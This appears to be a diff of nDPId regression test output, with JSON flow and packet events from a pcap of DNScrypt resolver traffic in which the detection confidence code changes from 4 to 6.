AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":59589,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":59589,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":402,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337078} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":402,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAABQ\/cwAub0RumoKAAABp3LcfQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45747,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAIc\/c1AAL0ReVYKAAABp3LcfbKzAbsCCEbGm2UBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45747,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45747,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":946739337078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739337078,"pkt":"ZmZmZmZmRERERERECABFAADWnoNAADURNfgzD3zQCgAAARD3laYAwhtvaUCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"} 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":946739337078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739337078,"pkt":"ZmZmZmZmRERERERECABFAADWnoVAADURNfYzD3zQCgAAARD30n8Awt6UaUGBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"} 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":946739337079,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739337079,"pkt":"ZmZmZmZmRERERERECABFAADWnoRAADURNfczD3zQCgAAARD3m+YAwhUraUSBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"} @@ -820,24 +820,24 @@ 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":946739337184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739337184,"pkt":"ZmZmZmZmRERERERECABFAADU4rYAADMRX7anctx9CgAAAQG7kEIAwObYm2mBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAHADAAQAAEAAAAAAH18RE5TQwACAACtvTpPmuzdARCZdHINGnm84Rta+Q9yZkJOIOBZH1xDWjyTETMesMGOqAFTeyjt37OaMFtfnU1CukJNcbLtFisLiXsfUndKvm3+Vr\/KkwQySWxBEvG+JEE+3LVi8Tb5u3eKex9Sd0q+bV9TqoVfU6qFX1T8BQ=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":410,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":35734,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAAIcw6lAAL0RhukKAAABBb2qxIuWAdECCHNXsoMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAQAAAAAAAAAAAAG7AAwBtwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":35734,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":35734,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":44496,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAAIcw6pAAL0RhugKAAABBb2qxK3QAdECCHNXsn8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAQAAAAAAAAAAAAG7AAwBtwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":44496,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":44496,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58104,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAAXcw6sgAL0RoycKAAABBb2qxOL4AdEGBCbssn4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAQAAAAAAAAAAAAW3AAwFswAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58104,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58104,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":413,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337184} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":413,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAABQw6sAub0Rx\/oKAAABBb2qxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":40748,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAAIcw6xAAL0RhuYKAAABBb2qxJ8sAdECCHNXsoEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAQAAAAAAAAAAAAG7AAwBtwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 